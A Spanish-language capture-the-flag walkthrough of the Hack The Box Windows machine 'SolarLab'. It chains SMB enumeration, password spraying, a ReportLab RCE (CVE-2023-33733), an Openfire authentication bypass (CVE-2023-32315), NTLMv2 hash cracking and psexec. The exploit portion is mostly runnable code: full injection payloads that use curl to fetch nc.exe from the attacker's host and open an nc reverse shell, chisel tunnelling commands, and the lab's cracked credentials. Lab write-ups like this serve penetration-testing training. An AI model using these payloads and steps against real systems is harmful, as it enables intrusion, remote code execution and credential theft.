Solar Lab
OS: Windows
Dificultad: Medio
Puntos: 30
Nmap
ports=$(nmap -p- --min-rate=5000 -T4 10.129.245.145 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -vvv -p $ports -sC -sV -oN nmap.txt 10.129.245.145
Nmap scan report for 10.129.245.145
Host is up, received echo-reply ttl 127 (0.20s latency).
Scanned at 2024-05-11 20:42:53 EDT for 58s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 nginx 1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.24.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
6791/tcp open http syn-ack ttl 127 nginx 1.24.0
|_http-server-header: nginx/1.24.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Enumeration
Agregamos los el dominio y el subdominio a nuestro archivo hosts.
echo "10.129.245.145 solarlab.htb report.solarlab.htb" >> /etc/hosts
Se encuentra un directorio llamado Documents en el SMB.
┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# smbclient -L 10.129.245.145
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.245.145 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Podemos acceder al directorio.
┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# smbclient //10.129.245.145/Documents
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Fri Apr 26 10:47:14 2024
.. DR 0 Fri Apr 26 10:47:14 2024
concepts D 0 Fri Apr 26 10:41:57 2024
desktop.ini AHS 278 Fri Nov 17 05:54:43 2023
details-file.xlsx A 12793 Fri Nov 17 07:27:21 2023
My Music DHSrn 0 Thu Nov 16 14:36:51 2023
My Pictures DHSrn 0 Thu Nov 16 14:36:51 2023
My Videos DHSrn 0 Thu Nov 16 14:36:51 2023
old_leave_request_form.docx A 37194 Fri Nov 17 05:35:57 2023
7779839 blocks of size 4096. 1895172 blocks available
smb: \>
Descargamos el archivo details-file.xlsx.
smb: \> get details-file.xlsx
getting file \details-file.xlsx of size 12793 as details-file.xlsx (21.4 KiloBytes/sec) (average 21.4 KiloBytes/sec)
Vemos que hay usuarios y passwords.
User Enumeration
En la pagina web http://report.solarlab.htb:6791/login hay un formulario de autenticacion. La pagina web muestra diferentes mensajes si el usuario existe o no, esto nos permite enumerar los usuarios.
Una vez que tenemos los usuario podemos hacer password spraying.
La cuenta blakeb nos permite acceder.
blakeb : ThisCanB3typedeasily1@
ReportLab RCE (CVE-2023-33733)
Despues probar todas las funcionalidades nos percatamos que la aplicacion genera PDFs con la herramienta ReportLab.
Identificamos que esta herramienta cuenta con una vulnerabilidad de RCE.
https://github.com/Sudistark/BB-Writeups/blob/main/2023/CVE-2023-33733-rce-via-htmli-in-reportlab.md
Haciendo pruebas nos dimos cuenta que en la funcion de Travel Approval podemos explotar esta vulnerabildad pero en el parametro travel_request ya que en los otros tenemos algunas restricciones.
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('curl 10.10.14.218') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>
┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.245.145 - - [11/May/2024 22:49:02] "GET / HTTP/1.1" 200 -
Con esto podemos obtener una reverse shell. Primero creamos una carpeta donde descargaremos nc.exe.
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('mkdir c:\\temp') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>
Descargamos el binario en la carpeta.
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('curl 10.10.14.218/nc.exe -o c:\\temp\\nc.exe') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>
Despues ejecutamos la reverse shell.
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('c:\\temp\\nc.exe -e cmd.exe 10.10.14.218 1234') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>
Lateral Movement
Ya que estamos dentro de la maquina identificamos que esta instalado Openfire.
c:\Program Files>dir
dir
Volume in drive C has no label.
Volume Serial Number is 385E-AC57
Directory of c:\Program Files
05/03/2024 02:34 PM <DIR> .
05/03/2024 02:34 PM <DIR> ..
11/16/2023 10:39 PM <DIR> Common Files
04/26/2024 04:39 PM <DIR> Internet Explorer
11/17/2023 11:04 AM <DIR> Java
11/16/2023 10:47 PM <DIR> Microsoft Update Health Tools
12/07/2019 12:14 PM <DIR> ModifiableWindowsApps
11/17/2023 03:22 PM <DIR> Openfire
Port Forwarding
Haremos un portforward para acceder al puerto de openfire con chisel. Descargamos el programa en la maquina.
python3 -m http.server 80
curl 10.10.14.105/chisel.exe -o c:\temp\chisel.exe
Creamos el tunel de la siguiente forma.
┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# /opt/linux/chisel server -p 5555 --reverse
2024/05/11 23:27:38 server: Reverse tunnelling enabled
2024/05/11 23:27:38 server: Fingerprint TOEwBCujyzAMJQGNMI8GuRRNJUqUJzmvpWlm/zVbC08=
2024/05/11 23:27:38 server: Listening on http://0.0.0.0:5555
2024/05/11 23:28:31 server: session#1: tun: proxy#R:9090=>9090: Listening
c:\temp>chisel.exe client 10.10.14.218:5555 R:9090:127.0.0.1:9090
chisel.exe client 10.10.14.218:5555 R:9090:127.0.0.1:9090
2024/05/12 06:28:30 client: Connecting to ws://10.10.14.218:5555
2024/05/12 06:28:31 client: Connected (Latency 167.5984ms)
Ahora podemos acceder al portal.
OpenFire Auth Bypass (CVE-2023-32315)
En nuestra investigacion del inicio relacionado con Openfire identificamos que podemos obtener RCE como lo mencionan los siguientes recursos.
https://github.com/miko550/CVE-2023-32315
https://vulncheck.com/blog/openfire-cve-2023-32315
https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT
Nos creamos un usuario random.
┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# python3 CVE-2023-32315.py -t http://127.0.0.1:9090
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗███████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚═══██╗██╔═══╝ ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██████╔╝███████╗██████╔╝ ██║███████║
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝
Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!
[..] Checking target: http://127.0.0.1:9090
Successfully retrieved JSESSIONID: node01rz9bs7xhmxrf13l0fomzxgetx1.node0 + csrf: holx9y5uZIvsaGw
User added successfully: url: http://127.0.0.1:9090 username: i78j4t password: 5vsjyv
Con esas credenciales podemos acceder.
OpenFire RCE (CVE-2023-32315)
Ahora obtendremos RCE de la siguiente forma. Primero descargaremos el plugin openfire-management-tool-plugin.jar y lo subimos en el apartado de plugins.
Una vez que se suba el plugin iremos al apartado de Server Settings y seleccionaremos la opcion Management Tool.
Nos pedira el password que es 123 y accederemos correctamente. Posteriormente seleccionaremos la opcion system command para poder ejecutar comandos.
Obtenemos una reverse shell.
c:\temp\nc.exe 10.10.14.218 4444 -e cmd.exe
Privilege Escalation
Con winpeas podemos obtener el hash NTLMv2 para posteriormente crackearlo.
┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
HotP!fireguard (openfire)
1g 0:00:00:13 DONE (2024-05-12 00:01) 0.07530g/s 835855p/s 835855c/s 835855C/s Howla8@hotmail.co.uk..Honey40
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Verificamos que tenemos acceso.
┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# crackmapexec smb 10.129.245.145 -u 'openfire' -p 'HotP!fireguard'
SMB 10.129.245.145 445 SOLARLAB [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB 10.129.245.145 445 SOLARLAB [+] solarlab\openfire:HotP!fireguard
Administrator : ThisPasswordShouldDo!@
impacket-psexec Administrator@10.129.245.145